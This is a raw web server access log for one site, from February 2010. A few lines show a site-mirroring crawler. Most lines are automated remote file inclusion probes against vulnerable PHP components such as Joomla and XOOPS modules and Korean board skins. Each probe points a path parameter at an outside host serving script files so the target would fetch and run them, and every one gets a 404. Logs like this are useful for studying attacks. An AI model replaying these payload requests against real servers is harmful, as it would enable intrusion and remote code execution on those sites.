189.115.138.192 - - [13/Feb/2010:10:01:30 -0800] "GET /ideal/?S=A HTTP/1.1" 200 524 "http://www.puaga.com/ideal/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:01:31 -0800] "GET /ideal/?D=A HTTP/1.1" 200 524 "http://www.puaga.com/ideal/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:01:32 -0800] "GET /login/logout.php HTTP/1.1" 302 57 "http://www.puaga.com/login/register.php" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:10:01:42 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:10:01:42 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:10:01:42 -0800] "GET /logs/access_100112.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:02:02 -0800] "GET /labs HTTP/1.1" 404 5258 "http://www.puaga.com/login/register.php" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:02:03 -0800] "GET /ideal HTTP/1.1" 301 90 "http://www.puaga.com/login/register.php" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:02:03 -0800] "GET /module/view?id=setup HTTP/1.1" 200 4268 "http://www.puaga.com/login/register.php" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:02:04 -0800] "GET /survey/survey.php?s_id=1 HTTP/1.1" 404 5258 "http://www.puaga.com/login/register.php" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:02:04 -0800] "GET /pictures HTTP/1.1" 301 93 "http://www.puaga.com/login/register.php" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:02:05 -0800] "GET /play HTTP/1.1" 404 5258 "http://www.puaga.com/login/register.php" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:02:05 -0800] "GET /downloads HTTP/1.1" 404 5258 "http://www.puaga.com/login/register.php" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:02:06 -0800] "GET /music HTTP/1.1" 404 5258 "http://www.puaga.com/login/register.php" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:02:06 -0800] "GET /my HTTP/1.1" 404 5258 "http://www.puaga.com/login/register.php" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
78.110.50.102 - - [13/Feb/2010:10:02:24 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [13/Feb/2010:10:02:25 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [13/Feb/2010:10:02:25 -0800] "GET /logs/access_100114.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:10:02:41 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:10:02:41 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:10:02:41 -0800] "GET /logs/access_100112.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:10:03:02 -0800] "GET /logs/access_100124.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:10:03:04 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:10:03:04 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:10:03:04 -0800] "GET /logs/access_100112.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:10:03:11 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:10:03:11 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:10:03:11 -0800] "GET /logs/access_100112.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:10:03:25 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:10:03:25 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:10:03:25 -0800] "GET /logs/access_100112.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:10:03:36 -0800] "GET /logs/access_100124.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:10:03:37 -0800] "GET /logs/access_100124.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:10:03:40 -0800] "GET /logs/access_100124.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [13/Feb/2010:10:04:02 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [13/Feb/2010:10:04:02 -0800] "GET /logs/access_100126.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [13/Feb/2010:10:04:02 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [13/Feb/2010:10:05:18 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.pnic.go.th//pictures/my_file/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [13/Feb/2010:10:05:18 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.pnic.go.th//pictures/my_file/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [13/Feb/2010:10:05:18 -0800] "GET /logs/access_100119.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.pnic.go.th//pictures/my_file/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [13/Feb/2010:10:05:18 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.pnic.go.th//pictures/my_file/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [13/Feb/2010:10:05:18 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.pnic.go.th//pictures/my_file/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [13/Feb/2010:10:05:18 -0800] "GET /logs/access_100119.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.pnic.go.th//pictures/my_file/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:10:05:19 -0800] "GET /logs/access_100128.log//errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:10:05:19 -0800] "GET /errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:10:05:19 -0800] "GET /logs//errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
213.251.189.205 - - [13/Feb/2010:10:05:27 -0800] "GET /logs/access_100126.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [13/Feb/2010:10:05:27 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [13/Feb/2010:10:05:27 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [13/Feb/2010:10:05:35 -0800] "GET /logs/access_100123.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [13/Feb/2010:10:05:37 -0800] "GET /logs/*include/write.php?dir=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [13/Feb/2010:10:05:37 -0800] "GET /*include/write.php?dir=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [13/Feb/2010:10:05:37 -0800] "GET /logs/access_100111.log%20%20/*include/write.php?dir=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [13/Feb/2010:10:05:47 -0800] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.pnic.go.th//pictures/my_file/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [13/Feb/2010:10:05:48 -0800] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.pnic.go.th//pictures/my_file/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [13/Feb/2010:10:06:19 -0800] "GET /logs/access_100123.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:10:06:38 -0800] "GET /logs/access_100109.log//errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:10:07:30 -0800] "GET /logs/access_100123.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [13/Feb/2010:10:07:32 -0800] "GET /skin/zero_vote/error.php?dir=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [13/Feb/2010:10:07:32 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [13/Feb/2010:10:07:32 -0800] "GET /logs/access_100119.log%20%20//skin/zero_vote/error.php?dir=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [13/Feb/2010:10:07:36 -0800] "GET /logs/access_100118.log%20%20//skin/zero_vote/error.php?dir=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [13/Feb/2010:10:07:41 -0800] "GET /*include/write.php?dir=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [13/Feb/2010:10:08:33 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [13/Feb/2010:10:08:33 -0800] "GET /skin/zero_vote/error.php?dir=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [13/Feb/2010:10:08:34 -0800] "GET /logs/access_100119.log%20%20//skin/zero_vote/error.php?dir=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:10:08:36 -0800] "GET /logs/access_100112.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [13/Feb/2010:10:08:38 -0800] "GET /logs/access_100118.log%20%20//skin/zero_vote/error.php?dir=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [13/Feb/2010:10:09:08 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [13/Feb/2010:10:09:08 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [13/Feb/2010:10:09:08 -0800] "GET /logs/access_100126.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [13/Feb/2010:10:09:08 -0800] "GET /logs/access_100109.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.247.64.12 - - [13/Feb/2010:10:10:39 -0800] "GET /logs/access_100111.log//include/write.php?dir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [13/Feb/2010:10:10:58 -0800] "GET /logs/access_100119.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.pnic.go.th//pictures/my_file/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [13/Feb/2010:10:10:58 -0800] "GET /logs/access.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.pnic.go.th//pictures/my_file/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.247.64.12 - - [13/Feb/2010:10:11:00 -0800] "GET /logs/access_100126.log//include/write.php?dir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [13/Feb/2010:10:11:01 -0800] "GET /logs/access_100119.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.pnic.go.th//pictures/my_file/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [13/Feb/2010:10:11:01 -0800] "GET /logs/access.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.pnic.go.th//pictures/my_file/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [13/Feb/2010:10:11:30 -0800] "GET /logs/access_100203.log%20%20//bbs//write_comment_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [13/Feb/2010:10:11:30 -0800] "GET /logs//bbs//write_comment_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [13/Feb/2010:10:11:30 -0800] "GET /bbs//write_comment_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [13/Feb/2010:10:11:35 -0800] "GET /bbs//write_comment_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [13/Feb/2010:10:11:35 -0800] "GET /logs//bbs//write_comment_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [13/Feb/2010:10:11:35 -0800] "GET /logs/access_100203.log//bbs//write_comment_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:10:11:43 -0800] "GET /logs/access_100123.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [13/Feb/2010:10:11:55 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [13/Feb/2010:10:11:55 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [13/Feb/2010:10:11:55 -0800] "GET /logs/access_100112.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [13/Feb/2010:10:13:00 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [13/Feb/2010:10:13:00 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [13/Feb/2010:10:13:02 -0800] "GET /logs/access_100112.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:10:13:15 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:10:13:15 -0800] "GET /config/dbutil.bck.php?confdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:10:13:16 -0800] "GET /logs/access_100130.log%20%20//config/dbutil.bck.php?confdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:10:13:16 -0800] "GET /logs/access_100125.log%20%20//config/dbutil.bck.php?confdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:10:13:18 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:10:13:19 -0800] "GET /config/dbutil.bck.php?confdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:10:13:19 -0800] "GET /logs/access_100125.log%20%20//config/dbutil.bck.php?confdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:10:13:21 -0800] "GET /logs/access_100130.log%20%20//config/dbutil.bck.php?confdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:10:13:48 -0800] "GET /logs/access_100125.log%20%20//config/dbutil.bck.php?confdir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:10:13:49 -0800] "GET /config/dbutil.bck.php?confdir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:10:13:49 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:10:13:50 -0800] "GET /logs/access_100130.log%20%20//config/dbutil.bck.php?confdir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [13/Feb/2010:10:14:07 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [13/Feb/2010:10:14:07 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [13/Feb/2010:10:14:07 -0800] "GET /logs/access_100112.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [13/Feb/2010:10:14:53 -0800] "GET /logs/access_100203.log%20%20//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [13/Feb/2010:10:14:53 -0800] "GET /logs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [13/Feb/2010:10:14:53 -0800] "GET /delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [13/Feb/2010:10:15:13 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:10:16:44 -0800] "GET /modify.php?dir_module=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:10:16:44 -0800] "GET /logs/access_100204.log%20%20//modify.php?dir_module=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:10:16:44 -0800] "GET /logs//modify.php?dir_module=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:10:16:47 -0800] "GET /logs/access_100126.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:10:16:47 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:10:16:47 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:10:16:50 -0800] "GET /logs/access_100208.log%20%20//modify.php?dir_module=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:10:16:53 -0800] "GET /logs/access_100201.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
